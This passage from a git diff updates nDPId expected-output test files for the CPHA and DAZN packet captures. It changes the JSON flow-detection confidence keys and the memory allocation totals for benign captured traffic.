~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 675 chars diff --git a/test/results/cpha.pcap.out b/test/results/cpha.pcap.out index ab91f7900..4473a6473 100644 --- a/test/results/cpha.pcap.out +++ b/test/results/cpha.pcap.out @@ -2,8 +2,8 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1603354463286} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603354463286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":96,"pkt_l4_len":58,"thread_ts_msec":1603354463286,"pkt":"AQBeFQMBAAAAAAEBgQAAFQgARQAATgAAAAD\/EQyKAAAAAKwVAwAftB+0ADpJ\/BqQDDEnhQABABZ5PgAB\/\/7gSgEAAAIAAQAACAoAAgADAAQAAAIECQAAAAkAAAAAAAIA"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} 00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":50,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1603354463286} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 663 chars diff --git a/test/results/dazn.pcapng.out b/test/results/dazn.pcapng.out index 415a46b4a..8dcf482fb 100644 --- a/test/results/dazn.pcapng.out +++ b/test/results/dazn.pcapng.out @@ -4,23 +4,23 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1653830614885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830614885,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nR9AAEAGx+XAqAGANFTfOtMEAbuvwsZTAAAAAKAC+vBmfAAAAgQFtAQCCAqWAjADAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1653830614902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830614902,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8gywAAPQGbdg0VN86wKgBgAG70wTy6KcPr8LGVKAS\/\/+ceQAAAgQFoAQCCAqKcaCKlgIwAwEDAwk="} 01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1653830614904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1653830614904,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nSFAAEAGxebAqAGANFTfOtMEAbuvwsZU8uinEIAYAfZtkgAAAQEICpYCMBWKcaCKFgMBAgABAAH8AwPGAVMbGSAdqErCRl+JXjKyqMchnfEu2B1zRzOaxV8o1iAgIXSPqMjljdeZ3z7HJVcJsXiZNidVLUq9BDfRlvUd8wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZGF6bi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgb4BCLF1x\/xJ6a5y\/t336Oc1aPROIMgrb5TqghyKk8UgAFwBBBJ9JHh6PsEBzfFNPwetkTywSgp2rvZxjUd7cfOXHBFgNjkLd+otPjvJdROVP19OEA+JHkFvE7miAvh9c39D0acUAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830614885,"flow_last_seen":1653830614904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830614904,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830614920,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830614885,"flow_last_seen":1653830614904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830614904,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830614920,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1653830640613,"flow_last_seen":1653830640613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1653830640613,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1653830640613,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830640613,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA81ThAAEAGoV3AqAGADeL0G7PUAbsidLdlAAAAAKAC+vBeiAAAAgQFtAQCCArtba2JAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1653830640629,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830640629,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8HAYAAPQG5o8N4vQbwKgBgAG7s9RejoeqInS3ZqAS\/\/\/XoAAAAgQFoAQCCApxJyp57W2tiQEDAwk="} 01161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1653830640634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1653830640634,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI51TpAAEAGn17AqAGADeL0G7PUAbsidLdmXo6Hq4AYAfYzVAAAAQEICu1trZ1xJyp5FgMBAgABAAH8AwNgo6eggHfe+PBZNxxz2f+Nts8It8o3t3RyfFY+U+8s3iC6XQSkJJt5cWG68Q2AWVjlm2pyKfMq4VXHQ5nXKhlFIwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAfAB0AABp1c2VyLXByb2ZpbGUuYXIuaW5kYXpuLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDBldI46Te7dQq3VD7W+6azi6DI\/x3CzXEMlx+YJs8PCwAXAEEEQNzV3U7NxlwdMnUehbZejtqtCZtaP2SJSRszCqNnAwH+g3rcgl4s+kaLRhv1lRSxAtta1rthAruCkIpXtKVXxQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQB8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830640613,"flow_last_seen":1653830640634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830640634,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830640651,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830640613,"flow_last_seen":1653830640634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830640634,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830640651,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1653830641480,"flow_last_seen":1653830641480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1653830641480,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1653830641480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830641480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85BtAAEAGknfAqAGADeL0Hp+yAbsjfBE0AAAAAKAC+vA8bQAAAgQFtAQCCAp3jv7MAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1653830641499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830641499,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8XjkAAPQGpFkN4vQewKgBgAG7n7LhtoguI3wRNaAS\/\/8VuQAAAgQFoAQCCArbVdxqd47+zAEDAwk="} 01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1653830641501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1653830641501,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55B1AAEAGkHjAqAGADeL0Hp+yAbsjfBE14baIL4AYAfZN2QAAAQEICneO\/uHbVdxqFgMBAgABAAH8AwP2xFVrrUUvT7baclvRUkGIqabLtROHVCH1j8n+tyIQOSBQFGnUgcb1RPrURqFyxAWNNtynXG\/2Smtg77i2bY+f2AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAnACUAACJzdWJzY3JpcHRpb25zLXNlcnZpY2UuZGF6bi1hcGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIFI+QFCwyxDx8rtg+zcI4aDG3vLdEXhdv9WlGPEzxkNWABcAQQRZp49grcHpoqyt72TjbH7tj6VIJDIKkQJbqcOiWq2yF5dYzF0IxbGxZvKD0AgVDvU5GFpnRplE+UiURWgGlLRaACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830641480,"flow_last_seen":1653830641501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830641501,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} 